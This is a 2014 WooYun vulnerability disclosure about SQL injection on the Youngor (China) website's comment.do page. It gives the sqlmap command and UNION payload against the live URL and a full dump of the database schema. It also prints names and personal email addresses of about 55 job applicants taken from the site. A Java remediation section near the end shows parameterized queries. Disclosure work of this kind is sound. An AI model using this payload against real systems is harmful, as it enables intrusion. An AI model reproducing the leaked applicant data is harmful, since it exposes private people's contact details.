Vulnerability summary

Defect ID: wooyun-2014-084899

Title: SQL injection on the official website of Youngor (China)

Affected vendor: Youngor (China)

Author: piza_M

Submitted: 2014-11-28 15:28

Fixed by: 2015-01-12 15:30

Published: 2015-01-12 15:30

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 10

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-11-28: actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public
2015-01-12: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

The official website of Youngor (China) is vulnerable to SQL injection.

Detailed description:

[root@Hacker~]# Sqlmap -u http://www.youngor.com/comment.do?artid=201303010126367100 --current-user --current-db
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:10:12
[09:10:13] [INFO] resuming back-end DBMS 'mysql'
[09:10:14] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: artid
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: artid=201303010126367100' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(0x3a6d6c643a,0x664d6758645741717274,0x3a7962683a), NULL, NULL, NULL, NULL, NULL#
---
[09:10:14] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5
[09:10:14] [INFO] fetching current user
current user: 'websiteDB@localhost'
[09:10:14] [INFO] fetching current database
current database: 'websiteDB'
Partial database list:
Database: websiteDB
[25 tables]
+---------------------------------------+
| hr_admin |
| hr_article |
| hr_channel |
| hr_class |
| hr_cmmword |
| hr_comment |
| hr_count |
| hr_ctcache |
| hr_files |
| hr_jobs |
| hr_jobset |
| hr_keyword |
| hr_log |
| hr_log_1 |
| hr_message |
| hr_offer |
| hr_resume |
| hr_system |
| hr_units |
| hr_user |
| sub_article |
| sub_class |
| sub_gbk |
| sub_order |
| sub_web |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Partial listing of table columns:
Database: websiteDB
Table: hr_units
[4 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| GroupArr | varchar(10) |
| ID | varchar(20) |
| LinkUrl | varchar(200) |
| UnitName | varchar(40) |
+----------+--------------+
Database: websiteDB
Table: hr_cmmword
[3 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| ID | varchar(20) |
| Keyword | varchar(100) |
| Note | varchar(400) |
+---------+--------------+
Database: websiteDB
Table: hr_log
[4 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| ClassID | varchar(20) |
| ID | varchar(20) |
| Operating | int(2) |
| UpdateTime | date |
+------------+-------------+
Database: websiteDB
Table: hr_count
[5 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| ClassName | varchar(100) |
| ID | varchar(20) |
| IPAddr | varchar(20) |
| UrlPath | varchar(200) |
| VisitTime | datetime |
+-----------+--------------+
Database: websiteDB
Table: hr_class
[22 columns]
+------------------+--------------+
| Column | Type |
+------------------+--------------+
| ChannelID | varchar(20) |
| Child | int(11) |
| ClassName | varchar(50) |
| ClassPicUrl | varchar(40) |
| Depth | int(11) |
| Hits | int(11) |
| ID | varchar(20) |
| IsPass | int(2) |
| IsSingle | int(2) |
| Items | varchar(200) |
| LinkUrl | varchar(200) |
| Meta_Description | text |
| Meta_Keywords | varchar(200) |
| NextID | varchar(20) |
| OpenType | int(2) |
| OrderID | int(11) |
| ParentID | varchar(20) |
| ParentPath | varchar(300) |
| PrevID | varchar(20) |
| Readme | text |
| Tips | varchar(200) |
| UpdateTime | datetime |
+------------------+--------------+
Database: websiteDB
Table: hr_resume
[30 columns]
+------------+---------------+
| Column | Type |
+------------+---------------+
| Address | varchar(100) |
| BirthDay | varchar(20) |
| City | varchar(80) |
| Contact | varchar(100) |
| Contactype | varchar(40) |
| Country | varchar(100) |
| EduBg | varchar(1000) |
| Email | varchar(80) |
| Family | varchar(1000) |
| ID | varchar(20) |
| IDnum | varchar(40) |
| IDtype | varchar(80) |
| Job | varchar(20) |
| JobState | int(2) |
| LanguageBg | varchar(1000) |
| Marryed | varchar(10) |
| Overseas | int(2) |
| Polity | varchar(80) |
| PostNum | varchar(40) |
| Province | varchar(80) |
| Salary | varchar(80) |
| SelfIntro | varchar(1000) |
| Sex | varchar(10) |
| SmallPhoto | varchar(50) |
| Updatetime | datetime |
| UserID | varchar(20) |
| UsrName | varchar(50) |
| WorkExper | varchar(1000) |
| WorkPlace | varchar(80) |
| Workyears | varchar(10) |
+------------+---------------+
Database: websiteDB
Table: sub_order
[15 columns]
+------------+---------------+
| Column | Type |
+------------+---------------+
| Address | varchar(200) |
| Company | varchar(200) |
| Email | varchar(80) |
| Fax | varchar(80) |
| GuestName | varchar(40) |
| ID | varchar(20) |
| IP | varchar(20) |
| Language | varchar(4) |
| Note | varchar(1000) |
| Pathstr | varchar(200) |
| PC | varchar(200) |
| Products | varchar(200) |
| SiteID | varchar(20) |
| Tel | varchar(80) |
| Updatetime | datetime |
+------------+---------------+
Database: websiteDB
Table: hr_article
[24 columns]
+----------------+---------------+
| Column | Type |
+----------------+---------------+
| Author | varchar(40) |
| ClassID | varchar(20) |
| Content | text |
| CopyFrom | varchar(200) |
| Editor | varchar(40) |
| Files | varchar(100) |
| Hits | int(11) |
| ID | varchar(20) |
| Inputer | varchar(40) |
| Intro | varchar(5000) |
| IsDel | int(2) |
| IsElite | int(2) |
| IsTop | int(2) |
| Keyword | varchar(200) |
| LinkUrl | varchar(200) |
| OrderID | int(11) |
| SmallPhoto | varchar(50) |
| Status | int(2) |
| Subheading | varchar(200) |
| Title | varchar(200) |
| TitleFontColor | varchar(7) |
| TitleFontType | varchar(20) |
| TitleShort | varchar(40) |
| UpdateTime | datetime |
+----------------+---------------+
Database: websiteDB
Table: hr_files
[9 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| ChannelID | varchar(20) |
| FileDir | varchar(100) |
| FileNameLocal | varchar(200) |
| FileNameRemote | varchar(20) |
| FileSize | int(11) |
| FileType | varchar(10) |
| ID | varchar(20) |
| InfoID | varchar(20) |
| UpdateTime | datetime |
+----------------+--------------+
Database: websiteDB
Table: hr_ctcache
[6 columns]
+-----------+-------------+
| Column | Type |
+-----------+-------------+
| ClassID | varchar(20) |
| ClassName | varchar(40) |
| Ct_add | int(11) |
| Ct_artile | int(11) |
| Ct_edit | int(11) |
| Ct_view | int(11) |
+-----------+-------------+
Database: websiteDB
Table: hr_jobs
[17 columns]
+-------------+---------------+
| Column | Type |
+-------------+---------------+
| Company | varchar(80) |
| CompanyType | varchar(20) |
| Contact | varchar(1000) |
| Duty | varchar(1000) |
| Education | varchar(20) |
| ID | varchar(20) |
| IsPass | int(2) |
| IsTJ | int(2) |
| JobRequire | varchar(1000) |
| Jobs | varchar(80) |
| JobsNum | int(11) |
| Jobstype | varchar(20) |
| OrderID | int(11) |
| SiteID | varchar(20) |
| UpdateTime | datetime |
| Workplace | varchar(80) |
| Workyears | varchar(20) |
+-------------+---------------+
Database: websiteDB
Table: hr_message
[14 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| Address | varchar(200) |
| City | varchar(80) |
| Country | varchar(80) |
| Email | varchar(80) |
| ID | varchar(20) |
| IP | varchar(20) |
| IsPass | int(2) |
| IsRead | int(2) |
| IsReply | int(2) |
| Message | text |
| Name | varchar(40) |
| Postcode | varchar(40) |
| Telphone | varchar(80) |
| UpdateTime | datetime |
+------------+--------------+
Database: websiteDB
Table: hr_keyword
[5 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| ID | varchar(20) |
| KeyWords | varchar(40) |
| Linkurl | varchar(400) |
| Num | int(11) |
| Updatetime | datetime |
+------------+--------------+
Database: websiteDB
Table: hr_system
[15 columns]
+------------------+---------------+
| Column | Type |
+------------------+---------------+
| CopyRight | varchar(300) |
| FileSize | int(11) |
| FileType | varchar(200) |
| GetAdmin | varchar(32) |
| ID | int(11) |
| IsYear | int(2) |
| Meta_Description | varchar(300) |
| Meta_Keywords | varchar(1000) |
| PicSize | int(11) |
| PicType | varchar(200) |
| ReturnNum | int(11) |
| Siteadm | varchar(30) |
| SiteEmail | varchar(200) |
| SiteName | varchar(200) |
| SiteUrl | varchar(200) |
+------------------+---------------+
Database: websiteDB
Table: sub_class
[25 columns]
+------------------+--------------+
| Column | Type |
+------------------+--------------+
| AdminUrl | varchar(200) |
| ChannelID | varchar(25) |
| Child | int(11) |
| ClassName | varchar(50) |
| ClassPicUrl | varchar(80) |
| DefultPic | varchar(50) |
| Depth | int(11) |
| ID | varchar(25) |
| IsNav | int(2) |
| IsPass | int(2) |
| IsSingle | varchar(20) |
| Items | varchar(200) |
| Language | varchar(4) |
| LinkUrl | varchar(200) |
| Meta_Description | text |
| Meta_Keywords | varchar(200) |
| NextID | varchar(25) |
| OpenType | int(2) |
| OrderID | int(11) |
| ParentID | varchar(25) |
| ParentPath | varchar(300) |
| PrevID | varchar(25) |
| Readme | text |
| Tips | varchar(200) |
| UpdateTime | datetime |
+------------------+--------------+
Database: websiteDB
Table: hr_offer
[12 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| Gmail | varchar(80) |
| Gname | varchar(40) |
| Gsex | varchar(2) |
| ID | varchar(20) |
| IsRead | int(2) |
| IsReply | int(2) |
| JobID | varchar(20) |
| Jobname | varchar(100) |
| Jobtype | varchar(2) |
| ResumeID | varchar(20) |
| UpdateTime | datetime |
| UserID | varchar(20) |
+------------+--------------+
Database: websiteDB
Table: hr_admin
[12 columns]
+------------------+-------------+
| Column | Type |
+------------------+-------------+
| AdminName | varchar(50) |
| Email | varchar(80) |
| EnableMultiLogin | int(2) |
| ID | varchar(20) |
| IsPass | int(2) |
| LastLoginIP | varchar(20) |
| LastLoginTime | datetime |
| LoginTimes | int(11) |
| Password | varchar(50) |
| Powerarr | text |
| Purview | int(2) |
| RegTime | datetime |
+------------------+-------------+
Database: websiteDB
Table: hr_comment
[10 columns]
+--------------+-------------+
| Column | Type |
+--------------+-------------+
| COMMENT_ID | bigint(20) |
| CONTENT | text |
| CREATE_TIME | datetime |
| IP | varchar(20) |
| IS_CHECK | tinyint(4) |
| IS_DISABLED | tinyint(4) |
| IS_RECOMMEND | tinyint(4) |
| MEMBER | varchar(50) |
| REF_DOC_ID | varchar(20) |
| WEBSITE_ID | bigint(20) |
+--------------+-------------+
Database: websiteDB
Table: sub_article
[24 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| Author | varchar(40) |
| ClassID | varchar(25) |
| Content | text |
| CopyFrom | varchar(200) |
| Editor | varchar(40) |
| Files | varchar(100) |
| Hits | int(11) |
| ID | varchar(20) |
| Inputer | varchar(40) |
| Intro | varchar(400) |
| IsDel | int(2) |
| IsElite | int(2) |
| IsTop | int(2) |
| Keyword | varchar(200) |
| LinkUrl | varchar(200) |
| OrderID | int(11) |
| SmallPhoto | varchar(80) |
| Status | int(2) |
| Subheading | varchar(200) |
| Title | varchar(200) |
| TitleFontColor | varchar(7) |
| TitleFontType | varchar(20) |
| TitleShort | varchar(40) |
| UpdateTime | datetime |
+----------------+--------------+
Database: websiteDB
Table: hr_jobset
[14 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| BirthYear | varchar(200) |
| City | varchar(400) |
| Contact | varchar(200) |
| Country | varchar(400) |
| Education | varchar(200) |
| IDtype | varchar(200) |
| Job | varchar(200) |
| Jobstype | varchar(200) |
| JobYear | varchar(200) |
| Langauge | varchar(400) |
| Marryed | varchar(200) |
| Polity | varchar(200) |
| Province | varchar(400) |
| Workyears | varchar(200) |
+-----------+--------------+
Database: websiteDB
Table: sub_gbk
[11 columns]
+------------+---------------+
| Column | Type |
+------------+---------------+
| Address | varchar(200) |
| Email | varchar(80) |
| Fax | varchar(80) |
| GuestName | varchar(40) |
| ID | varchar(20) |
| IPaddr | varchar(20) |
| Language | varchar(4) |
| Note | varchar(1000) |
| SiteID | varchar(20) |
| Tel | varchar(80) |
| Updatetime | datetime |
+------------+---------------+
Database: websiteDB
Table: hr_log_1
[5 columns]
+-----------+---------------------+
| Column | Type |
+-----------+---------------------+
| id | bigint(20) unsigned |
| loginName | varchar(50) |
| logip | varchar(50) |
| opshow | text |
| optime | varchar(50) |
+-----------+---------------------+
Database: websiteDB
Table: hr_channel
[15 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| ChannelName | varchar(50) |
| ChannelType | int(2) |
| Child | int(11) |
| Depth | int(11) |
| ID | varchar(20) |
| IsPass | int(2) |
| LinkUrl | varchar(200) |
| NextID | varchar(20) |
| OpenType | int(2) |
| OrderID | int(11) |
| ParentID | varchar(20) |
| ParentPath | varchar(300) |
| PrevID | varchar(20) |
| ReadMe | varchar(200) |
| UnitID | varchar(20) |
+-------------+--------------+
Database: websiteDB
Table: hr_user
[7 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| Email | varchar(80) |
| ID | varchar(20) |
| IP | varchar(20) |
| IsPass | int(2) |
| Password | varchar(40) |
| UpdateTime | datetime |
| UserName | varchar(32) |
+------------+-------------+
Database: websiteDB
Table: sub_web
[18 columns]
+------------------+---------------+
| Column | Type |
+------------------+---------------+
| AdmEmail | varchar(80) |
| AdmId | varchar(50) |
| AdmName | varchar(50) |
| AdmPwd | varchar(50) |
| cJapan | varchar(2) |
| CopyRight | varchar(300) |
| ID | varchar(20) |
| IndexLogo | varchar(100) |
| IsPass | int(2) |
| Logo | varchar(100) |
| Meta_Description | varchar(300) |
| Meta_Keywords | varchar(1000) |
| OrderID | int(11) |
| SubName | varchar(200) |
| SubUrl | varchar(200) |
| TopLogo | varchar(100) |
| TopLogoEn | varchar(100) |
| UpdateTime | datetime |
+------------------+---------------+
Partial row contents of hr_offer:
200811120146026619,杜俊杰,djj@hongru.com
200902130657017789,梅梁梅,liangcool1986@163.com
200902140954017813,王斌斌,310158142@qq.com
200902160316518653,陈栋蕾,silen2005@126.com
200902170245308713,戴丹丹,daidandanegg@163.com
200902170443242564,柳乐安,liuleanlawyer@yahoo.com.cn
200902191006122240,赵华威,happy86022177@qq.com
200901181003211866,Kevin Chang,kchang0614@gmail.com
200902200128325630,伍胜男,shengnanwu@126.com
200902191108352943,张越己,fudanyjzhang@126.com
200902191108352943,张越己,fudanyjzhang@126.com
200902201054231850,殷白露,ybl186@qq.com
200902200128325630,伍胜男,shengnanwu@126.com
200902220839541000,关世杰,guanshijie@126.com
200902240342003700,李欣,lixine1000@126.com
200902241107348458,张晶晶,zjj861209@126.com
200902241107348458,张晶晶,zjj861209@126.com
200902250845101000,王晓峰,lanyanxiaowang@163.com
200902260912539145,范子敬,zijing.raeuber@gmail.com
200902261215045000,潘师节,Sabrina0714@163.com
200902270458334672,邹豹,jxzb_2007@126.com
200902271001190000,叶科,yeke1116@163.com
200902280951004800,吴庆海,11wuqinghai@163.com
200903010346065100,顾延君,guyanjun.2007@163.com
200903021245222717,杨蕊,abbyyoung.job@gmail.com
200903010346065100,顾延君,guyanjun.2007@163.com
200903010346065100,顾延君,guyanjun.2007@163.com
200903010346065100,顾延君,guyanjun.2007@163.com
200903050141353615,张蓓,zhangbei23s@126.com
200903050413089849,马亮,ml0552@126.com
200903050449367493,喻丽红,yulihong19861102@126.com
200903050449367493,喻丽红,yulihong19861102@126.com
200903070638388538,董 力銘,donglm@hotmail.co.jp
200903100929019247,陈荣,steve_chen1026@163.com
200903010346065100,顾延君,guyanjun.2007@163.com
200903120851025754,何 伟,dvdhewei@gmail.com
200903131112240000,闫兵兵,bingbin7916@sina.com
200903150131161887,李威,wilighy@sina.com
200903160824257618,邹助茜,zouzoushi@163.com
200903160909148000,潘康垒,pkl1209@163.com
200903161050586000,马欢,colin1101@sina.com
200903170725480000,张益东,zyd716@126.com
200902240342003700,李欣,lixine1000@126.com
200903170725480000,张益东,zyd716@126.com
200903110138107757,许瀚文,hongxiu1023@163.com
200903220736441100,宓开芳,517657608@qq.com
200903221121268894,张国锋,michael_zhang_2006@hotmail.com
200903221121268894,张国锋,michael_zhang_2006@hotmail.com
200902211134078828,高帅,fuyaosheri@sina.com
200903240338392275,何媛,qingfengpu_c@163.com
200903240338392275,何媛,qingfengpu_c@163.com
200903290114300000,秦波,173845871@163.com
200903290818414193,张欣,xinxin86@live.cim
200903301022099451,罗明,luom_22@163.com
200902011232092349,何媛,heyuan1232522@163.com

Proof of vulnerability:

Already demonstrated above.

Remediation:

Filter the parameter.

Copyright notice: when reproducing, credit the source as piza_M@乌云 (WooYun)
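The report's one-line remediation ("filter the parameter") can be made concrete. The following is an added illustration, not code from the Youngor site or from the report's author: it assumes, since the report does not show the servlet, that comment.do looks comments up by the artid request parameter against the hr_comment table the report enumerates (REF_DOC_ID varchar(20), CONTENT text) over JDBC. The vulnerable method shows the string-splicing pattern the sqlmap output implies (a single quote in artid closes the literal and the rest of the payload becomes SQL); the fixed method allow-lists artid to digits and binds it with a PreparedStatement, so the value can never change the statement's shape.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

/*
 * Added example (not the site's code). Assumption: comment.do resolves
 * artid against hr_comment.REF_DOC_ID, the table/column listed in the report.
 */
public class CommentDao {

    // artid values in the report are 18-digit numeric strings and the column
    // is varchar(20): accept 1-20 ASCII digits and nothing else.
    private static final Pattern ARTID = Pattern.compile("[0-9]{1,20}");

    /** Vulnerable pattern: the request parameter is spliced into the SQL text. */
    public static List<String> commentsUnsafe(Connection conn, String artid) throws SQLException {
        // A quote in artid ends the string literal; everything after it is parsed as SQL.
        String sql = "SELECT CONTENT FROM hr_comment WHERE REF_DOC_ID = '" + artid + "'";
        List<String> out = new ArrayList<>();
        try (Statement st = conn.createStatement(); ResultSet rs = st.executeQuery(sql)) {
            while (rs.next()) {
                out.add(rs.getString(1));
            }
        }
        return out;
    }

    /** Fixed: validate against an allow-list, then bind the value as a parameter. */
    public static List<String> comments(Connection conn, String artid) throws SQLException {
        // matches() anchors to the whole string, so "123' UNION ..." is rejected here.
        if (artid == null || !ARTID.matcher(artid).matches()) {
            throw new IllegalArgumentException("artid must be 1-20 digits");
        }
        String sql = "SELECT CONTENT FROM hr_comment WHERE REF_DOC_ID = ?";
        List<String> out = new ArrayList<>();
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            // The driver sends the value separately from the statement text;
            // the database never re-parses it as SQL.
            ps.setString(1, artid);
            try (ResultSet rs = ps.executeQuery()) {
                while (rs.next()) {
                    out.add(rs.getString(1));
                }
            }
        }
        return out;
    }
}
```

Two points beyond the query itself follow from the report. The `--current-user` output shows the application connecting as `websiteDB@localhost`, an account that can enumerate information_schema and read hr_admin and hr_user (both carry a Password column): a dedicated account granted only SELECT on the tables a public page needs limits what any remaining injection can reach. And the UNION payload sqlmap found relies on the error-free rendering of the comment page; logging rejected artid values from the validation step above gives the operations team a signal that the parameter is being probed.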


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively declined.